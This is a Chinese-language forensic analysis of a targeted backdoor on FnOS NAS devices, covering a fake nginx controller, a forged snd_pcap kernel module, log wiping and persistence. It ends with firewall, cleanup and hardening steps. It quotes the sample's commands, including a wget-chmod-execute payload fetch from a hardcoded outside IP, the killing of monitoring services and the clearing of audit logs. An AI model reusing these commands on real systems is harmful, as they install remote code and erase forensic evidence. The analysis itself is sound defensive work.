核心内容摘要
【Spring】Spring MVC案例
文章目录飞牛 FnOS 定向攻击样本深度分析一次内核级后门植入与持久化控制的完整解剖
攻击概览这不是普通木马
异常现象不可删除的系统文件
双文件同哈希自复制控制器
内核级后门snd_pcap 模块
可疑模块加载
模块信息
trim_https_cgi系统清道夫与下载器
网络控制节点C2
攻击链
总结
修复与验证
防火墙封锁
清除模块
修复启动项
重启验证
系统级防护建议
结语飞牛 FnOS 定向攻击样本深度分析一次内核级后门植入与持久化控制的完整解剖摘要本文记录了一起针对飞牛 FnOS NAS 系统的定向后门攻击事件。
攻击者通过伪装成系统组件的二进制文件与内核模块构建了一个具备内核态隐藏、系统级持久化、日志抹除、远控下载、服务劫持等能力的完整控制链。
本次分析不仅揭示了样本的运行机理也暴露了当前定制 Linux NAS 生态在模块信任链、启动完整性、服务保护等方面的系统性缺陷。
攻击概览这不是普通木马从行为特征判断这并非泛化传播的勒索或挖矿样本而是定向针对 FnOS 内核与服务结构拥有内核态驻留能力具备服务持久化机制可远程拉取任意二进制并执行具备日志清除、痕迹抹除能力这意味着攻击者已经具备持续控制你 NAS 的能力。
异常现象不可删除的系统文件第一异常来自文件系统属性lsattr -Ra /usrattrgrep\-i-attr发现多个关键文件被设置为iimmutable属性/usr/bin/nginx /usr/trim/bin/trim_https_cgi /usr/sbin/gots /etc/rc.local /etc/systemd/system/nginx.service /etc/systemd/system/trim_https_cgi.service即使 root 也无法删除必须先执行chattr -ifile这是一种典型的“持久化自保护”手段。
双文件同哈希自复制控制器/usr/bin/nginx与/usr/sbin/gots的 MD5 完全一致。
它们并非真正的 nginx而是同一控制程序的多个伪装副本。
从字符串中可以看到pkill -f network_service|resmon_service mv /usr/bin/cat /usr/bin/cat2 systemctl enable %s.service /etc/rc.local
45.
95.
2
102该程序具备以下能力功能说明命令劫持替换系统 cat服务劫持篡改 systemd service启动植入rc.local service网络通信固定 C2 地址服务清洗杀飞牛监控服务
内核级后门snd_pcap 模块
可疑模块加载/etc/modules中多出snd_pcap飞牛官方镜像中不存在该模块。
模块信息modinfo snd_pcapfilename: snd_pcap.ko description: Save logs author: FnOS这是明显伪造字段试图与官方模块风格保持一致。
该模块与用户态恶意程序协作具备隐藏监听端口干扰 lsof、fuser、ss 显示屏蔽进程信息这解释了为何ss -ntlp|grep57132LISTEN... -却无法定位进程。
trim_https_cgi系统清道夫与下载器该文件负责删除系统日志清空 audit 记录修改系统启动脚本拉取远控二进制wget http://
151.
240.
1
91/turmp -O /tmp/turmp chmod 777 /tmp/turmp /tmp/turmp并清理/var/log/messages /var/log/audit/audit.log /usr/trim/logs/*.log这意味着系统所有取证线索都会被持续清除。
网络控制节点C2IP功能
45.
95.
2
102控制/心跳
151.
240.
1
91远程 Payload 下载该样本并不绑定域名直接硬编码 IP说明攻击者预期长期控制不在乎溯源
攻击链
总结内核模块 (snd_pcap) ↓ 隐藏监听端口 ↓ 用户态控制器 (gots/nginx) ↓ 服务劫持 rc.local ↓ 日志清理 (trim_https_cgi) ↓ 远程拉取执行这是一个完整的内核级后门体系。
修复与验证
防火墙封锁ip daddr
45.
95.
2
102 drop ip daddr
151.
240.
1
91 drop
清除模块rm-f /lib/modules/
6.
1
18-trim/snd_pcap.ko depmod -a
修复启动项清理 rc.local删除恶意 service还原 system_startup.sh
重启验证模块是否重现端口是否复活启动脚本是否被篡改
系统级防护建议项目建议内核模块强制签名校验启动完整性A/B 启动校验服务保护systemd 完整性校验SSH禁止 root 密码防火墙nftables 出站控制日志远程集中存储入侵检测auditd AIDE
结语这不是“中病毒”而是被接管。
如果一个攻击者能在内核态隐藏自身、篡改系统服务、抹除日志、远控下载执行——那么这台设备已经不再可信。
这次事件不是单点故障而是整个定制 NAS 生态对安全架构的警告。
如果系统没有可信启动链root 也只是“被允许存在”的用户。
本次对飞牛 FnOS 恶意程序的取证与逆向分析表明这并不是普通的系统入侵或单一木马而是一套具备内核态驻留、用户态控制、服务级持久化、日志抹除与远程下发执行能力的完整后门体系。
攻击者通过伪装系统组件、篡改启动链、植入内核模块与隐藏监听端口实现了对系统的长期隐蔽控制。
从技术层面看问题的根源并不只在样本本身而在于 FnOS 现有架构缺乏模块信任校验、启动完整性保护与服务篡改检测机制。
此次事件说明定制 Linux 系统如果没有建立从内核到服务的安全信任链即使拥有 root 权限也无法真正掌控系统安全。